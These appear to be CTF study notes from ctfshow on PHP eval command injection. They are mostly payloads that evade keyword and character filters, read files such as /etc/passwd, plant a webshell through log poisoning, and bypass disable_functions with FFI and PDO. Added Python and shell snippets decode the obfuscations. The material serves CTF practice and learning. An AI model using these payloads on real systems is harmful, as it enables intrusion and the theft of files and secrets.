2021/10/27--2021/10/29 CTF command execution (ctfshow)

Goal: obtain the flag

eval($c);

Keywords are filtered, then the passed parameter is executed.

I. Filtering

1. flag is filtered

?c=system("cat fla*.php");
?c=phpinfo();
?c=phpinfo()?>
?c=system('ls');

2. system and cat are filtered

?c=system("cp fla?.php 1.txt");
?c=`cp fla?.??? 1.txt`;
?c=eval($_GET[1]);&1=system('cat flag.php');
?c=ta''c fla?.php

3. Comma, quotes, semicolon, space and the like are filtered

?c=include%0a$_GET[1]?>&1=/etc/passwd
?c=include%0a$_GET[1]?>&1=/bin/ls
?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
?c=data://text/plain,<?php system("tac flag.php");?>
?c=data://text/plain,<?php system("mv fla?.php 1.txt");?>
?c=data://text/plain,<?php system("cp fl*.* 1.txt");?>
The equals sign is the short echo tag:
?c=data://text/plain,<?=system("cp fl*.* 1.txt");?>
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
?c=session_start();system(session_id());
The command is carried in the cookie: put a command such as ls in the PHPSESSID value.
Get all current variables:
?c=print_r(get_defined_vars());
?c=print_r(next(get_defined_vars()));
?c=eval(array_pop(next(get_defined_vars())));
then POST the parameter 1=system("tac fla?.php");

Principle of constructing characters with bitwise OR; see the video for how to use the web41 script.

A <--> %40|%01 (hexadecimal)
Avoid %0d, i.e. a carriage return, in the construction
phpinfo();
('phpinfo')();
('system')('ls');
(('%40'|'%13').('%40'|'%19').('%40'|'%13').('%40'|'%14').('%40'|'%05').('%60'|'%0d'))(('%40'|'%0c').('%40'|'%13'));
%0d produces a carriage return, so the command cannot execute:
system
();
?c=mv${IFS}fla?.php${IFS}b.txt  (rename)
?c=ta''c${IFS}fla?.php
?c=paste${IFS}fl?g.php%0a  (paste prints the content)
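How the OR-built call above resolves, as an added example that is not part of the notes: this Python decoder ORs each ('%xx'|'%yy') pair the way PHP ORs two one-byte strings, and returns the callee and argument that eval actually sees. SAMPLE is the payload from the note, copied in as constructed input.

```python
import re
from urllib.parse import unquote

# Constructed sample: the OR-built call from the note above, copied as written there.
SAMPLE = ("(('%40'|'%13').('%40'|'%19').('%40'|'%13').('%40'|'%14')"
          ".('%40'|'%05').('%60'|'%0d'))"
          "(('%40'|'%0c').('%40'|'%13'))")

# One ('%xx'|'%yy') pair; PHP ORs the two one-byte strings byte by byte.
PAIR = re.compile(r"\('(%[0-9A-Fa-f]{2})'\|'(%[0-9A-Fa-f]{2})'\)")


def or_pairs(group: str) -> str:
    """Resolve every ('%xx'|'%yy') pair in a '.'-joined group to its result byte."""
    return "".join(chr(ord(unquote(a)) | ord(unquote(b)))
                   for a, b in PAIR.findall(group))


def decode_or_call(payload: str) -> tuple:
    """Split the (callee)(argument) shape at its only ')(' boundary and decode both sides."""
    callee, arg = payload.split(")(", 1)
    return or_pairs(callee), or_pairs(arg)


if __name__ == "__main__":
    func, arg = decode_or_call(SAMPLE)
    print(f"callee={func!r} argument={arg!r}")
```

PHP resolves function names case-insensitively, which is why SYSTEm still reaches system; the argument decodes to LS exactly as the bytes in the note give it.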

4. $ is not filtered

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
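Why the $((~$(()))) chain evaluates to a number, as an added example that is not from the notes: a small POSIX shell function that builds a chain of N copies and evaluates it. $(()) with an empty expression is 0, ~0 is -1, N copies written back to back read as -1-1-1... = -N, and the outer ~ turns that into N-1, so 37 copies give 36.

```shell
# Added example: build and evaluate a chain of N copies of $((~$(()))).
tilde_chain() {
    n=$1
    inner=""
    i=0
    while [ "$i" -lt "$n" ]; do
        # each copy expands to -1; concatenated they form -1-1-1... = -N
        inner="${inner}\$((~\$(())))"
        i=$((i + 1))
    done
    # evaluate the generated text exactly as the shell would on injection: ~(-N) = N-1
    eval "echo \$((~\$((${inner}))))"
}

tilde_chain 37    # prints 36
```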

II. Black hole

?c=tac%20flag.php;ls
?c=tac%20flag.php%26%26ls
system($c." >/dev/null 2>&1");
>/dev/null: anything written to this file descriptor is discarded.
2>&1: 1 is standard output, 2 is standard error, 0 is standard input;
this redirects standard error to standard output.
?c=cp${IFS}/fla?${IFS}/var/www/html/b.txt||ls;
?c=mv${IFS}/fla?${IFS}/var/www/html/b.txt||ls;
?c=tac%09flag.php%26%26ls
%26 <--> &
?c=nl<fla''g.php%7c%7cls
%7c <--> |

system prints the command output by itself.
Return value of system:
on success, the last line of the command output; on failure, false.

III. Uploading a file (digits and letters are filtered; only ? and . remain)

With a POST file upload, the uploaded file is saved in the temp directory under the default name /tmp/phpXXXXXX, where the last 6 characters are random upper- or lowercase letters.
Uppercase ASCII letters are matched with [@-[].

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST</title>
</head>
<body>
<form action="http://XXXXXXXXXXX" method="post" enctype="multipart/form-data">
	<label for="file">文件名:</label>
	<input type="file" name="file" id="file"><br>
	<input type="submit" name="submit" value="提交">
</form>
</body>
</html>

Capture the request while uploading and pass in the c parameter:
POST /?c=.%20/???/???[@-[] HTTP/1.1
Change the file content to:

#!/bin/sh
tac /var/www/html/flag.php

IV. Disabled functions

?c=file_get_contents('flag.php');
?c=echo shell_exec('ls');
GET:?1=php://filter/convert.base64-encode/resource=flag.php
POST:c=include($_GET[1]);
1. ADD HEADER: Name: User-Agent, Value: <?php eval($_POST[a]);?>
2. Turn off ADD HEADER
3.POST:c=include($_GET[1]);&a=highlight_file('flag.php');
GET:?1=/var/log/nginx/access.log
?c=highlight_file('flag.php');
?c=show_source('flag.php');
?c=include('flag.php');echo $flag;
?c=include('flag.php');var_dump(get_defined_vars());
?c=print_r(scandir('.'));  current directory

The challenge renames flag.php to flag.txt

?c=var_dump(scandir('.'));  current directory
?c=var_dump(scandir('../'));  parent directory
?c=var_dump(scandir('/'));  root directory
?c=highlight_file('/flag.txt');

V. More

GET and POST with cURL

?c=$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "file:///var/www//html/flag.php");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);curl_close($ch);print_r($output);
?c=include('/flag.txt');
?c=include('/flag.txt');exit();

glob:// wrapper (to see file names)

c=$a="glob:///*.txt"; # all .txt files in the root directory
if($b=opendir($a)) # open the directory stream
{
	while(($file=readdir($b))!==false) # loop over the entries
	{
		echo "filename:".$file."\n";
	}
	closedir($b);
}
exit();
# found a file named flag0.txt

Use the public UAF script; see the video for web72.


Bypassing open_basedir and disable_functions

c=
try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
        'root');

    foreach ($dbh->query('select load_file("/flag36.txt")') as $row) {
        echo ($row[0]) . "|";
    }
    $dbh = null;
} catch (PDOException $e) {
    echo $e->getMessage();
    exit(0);
}
exit(0);

FFI bypass of disable_functions (PHP 7.4)
Use var_dump to inspect the directory first

c=$ffi = FFI::cdef("int system(const char *command);");
$a='/readflag>/var/www/html/1.txt';
$ffi->system($a);exit();

Clever constructions

code=${PATH:~A}${PWD:~A} ????.???

# gives the length of a variable's value:

${#var}
code=${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?????${#RANDOM} ????.???

$?
Return status of the previous command. Usually 0 means success and non-zero means an error,
but both 0 and a non-zero status have length 1.

code=${PWD::${#?}}???${PWD::${#?}}${PWD:${#IFS}:${#?}}?? ????.???
<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???

Base-conversion bypass

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos});&abs=system&acos=tac flag.php
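What the base-conversion payload above resolves to, as an added example that is not part of the notes: a small Python deobfuscator that mirrors PHP's base_convert, dechex and hex2bin, rewrites the numeric disguises as the strings they produce, and follows $$pi{key} through $_GET to the final call. SAMPLE and PARAMS are the eval body and the abs/acos query parameters from the note, copied in as constructed input.

```python
import re
import string

DIGITS = string.digits + string.ascii_lowercase   # the alphabet PHP base_convert uses


def base_convert(number: int, to_base: int) -> str:
    """Mirror PHP base_convert(number, 10, to_base) for a non-negative integer."""
    if number == 0:
        return "0"
    out = []
    while number:
        number, r = divmod(number, to_base)
        out.append(DIGITS[r])
    return "".join(reversed(out))


def dechex(number: int) -> str:
    """Mirror PHP dechex(): lowercase hex without a 0x prefix."""
    return format(number, "x")


def hex2bin(hexstr: str) -> str:
    """Mirror PHP hex2bin() for an even-length hex string."""
    return bytes.fromhex(hexstr).decode("latin-1")


def unmask(payload: str) -> str:
    """Replace the numeric disguises in a payload with the literal strings they produce."""
    payload = re.sub(r"base_convert\((\d+),\s*10,\s*36\)",
                     lambda m: repr(base_convert(int(m.group(1)), 36)), payload)
    payload = re.sub(r"dechex\((\d+)\)",
                     lambda m: repr(dechex(int(m.group(1)))), payload)
    # PHP lets a string literal name the function being called: 'hex2bin'('5f474554')
    payload = re.sub(r"'hex2bin'\('((?:[0-9a-f]{2})+)'\)",
                     lambda m: repr(hex2bin(m.group(1))), payload)
    return payload


def resolve_call(payload: str, params: dict) -> str:
    """Follow $$pi{key} through $_GET to the call eval would finally make."""
    unmasked = unmask(payload)
    name = re.search(r"\$pi='([^']+)';", unmasked)
    if not name or name.group(1) != "_GET":
        return unmasked
    return re.sub(r"\$\$pi\{(\w+)\}",
                  lambda m: repr(params[m.group(1)]) if m.group(1) in params else m.group(0),
                  unmasked)


# Constructed sample: the eval body and query parameters from the note above.
SAMPLE = "$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos});"
PARAMS = {"abs": "system", "acos": "tac flag.php"}
```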